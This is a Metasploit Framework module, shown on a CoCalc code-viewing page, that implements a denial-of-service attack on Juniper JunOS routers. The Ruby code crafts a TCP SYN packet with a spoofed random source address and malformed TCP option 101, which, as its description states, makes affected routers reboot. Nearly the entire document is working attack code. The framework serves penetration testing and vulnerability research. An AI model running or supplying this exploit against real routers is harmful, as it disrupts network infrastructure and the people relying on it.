CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/tcp/junos_tcp_opt.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Capture

8
  include Msf::Auxiliary::Dos

9


10
  def initialize

11
    super(

12
      'Name'        => 'Juniper JunOS Malformed TCP Option',

13
      'Description' => %q{ This module exploits a denial of service vulnerability

14
        in Juniper Network's JunOS router operating system. By sending a TCP

15
        packet with TCP option 101 set, an attacker can cause an affected

16
        router to reboot.

17
        },

18
      'Author'      => 'todb',

19
      'License'     => MSF_LICENSE,

20
      'References' =>

21
        [

22
          ['BID', '37670'],

23
          ['OSVDB', '61538'],

24
          ['URL','http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/']

25
        ]

26
    )

27


28
    register_options([

29
      OptInt.new('RPORT', [false, 'The destination port (defaults to random)']),

30
      OptInt.new('SPORT', [false, 'Source port (defaults to random)']),

31
      OptAddress.new('SHOST', [false, 'Source address (defaults to random)'])

32
    ])

33


34
    deregister_options('FILTER','PCAPFILE', 'SNAPLEN')

35
  end

36


37
  def rport

38
    datastore['RPORT'].to_i.zero? ? rand(0xffff) : datastore['RPORT'].to_i

39
  end

40


41
  def sport

42
    datastore['SPORT'].to_i.zero? ? rand(0xffff) : datastore['SPORT'].to_i

43
  end

44


45
  def shost

46
    datastore['SHOST'] || IPAddr.new(rand(0xffffffff), Socket::AF_INET).to_s

47
  end

48


49
  def run

50


51
    open_pcap

52


53
    p = PacketFu::TCPPacket.new

54
    p.ip_daddr = rhost

55
    p.ip_saddr = shost

56
    p.ip_ttl = rand(128) + 128

57
    p.tcp_sport = sport

58
    p.tcp_dport = rport

59
    p.tcp_flags.syn = 1

60
    p.tcp_win = rand(4096)+1

61
    p.tcp_opts = "e\x02\x01\x00" # Opt 101, len 2, nop, eol

62
    p.recalc

63
    print_status("#{p.ip_daddr}:#{p.tcp_dport} Sending TCP Syn packet from #{p.ip_saddr}:#{p.tcp_sport}")

64
    capture_sendto(p,rhost)

65
    close_pcap

66
  end

67
end

68


69